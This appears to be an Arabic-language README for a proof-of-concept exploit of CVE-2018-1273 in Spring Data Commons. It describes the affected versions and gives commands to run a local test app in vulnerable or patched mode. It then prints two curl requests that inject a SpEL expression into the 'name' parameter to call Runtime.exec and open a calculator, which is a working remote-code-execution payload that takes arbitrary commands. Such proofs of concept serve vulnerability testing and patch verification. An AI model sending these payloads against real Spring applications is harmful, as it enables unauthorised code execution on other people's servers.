
استغلال إثبات المفهوم لـ CVE-2018-1273، وهو ثغرة في ربط الخصائص في Spring Data Commons تؤدي إلى تنفيذ تعليمات برمجية عن بُعد عبر معلمات طلب HTTP مصممة خصيصًا.
Spring Data Commons، الإصدارات التي تسبق 1.13 إلى 1.13.10، و2.0 إلى 2.0.5، بالإضافة إلى الإصدارات القديمة غير المدعومة، تحتوي على ثغرة في ربط الخصائص ناتجة عن التعقيم غير السليم للعناصر الخاصة. يمكن لمستخدم ضار عن بُعد غير موثَّق (أو مهاجم) تقديم معاملات طلب مُصمَّمة خصيصًا ضد موارد HTTP المدعومة من Spring Data REST، أو باستخدام ربط حمولة الطلب القائم على الإسقاط في Spring Data، مما قد يؤدي إلى هجوم تنفيذ تعليمات برمجية عن بُعد.
مزيد من المعلومات هنا
يمكن اختبار التطبيق باستخدام الإصدار الضعيف أو الإصدار المُصحَّح من Spring Data Commons.
mvn spring-boot:run
mvn spring-boot:run -Dfixed
قم بتشغيل الأمر التالي للتحقق مما إذا كان يمكن استغلال الثغرة:
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')]=test"
من إعداد https://www.arima.eu
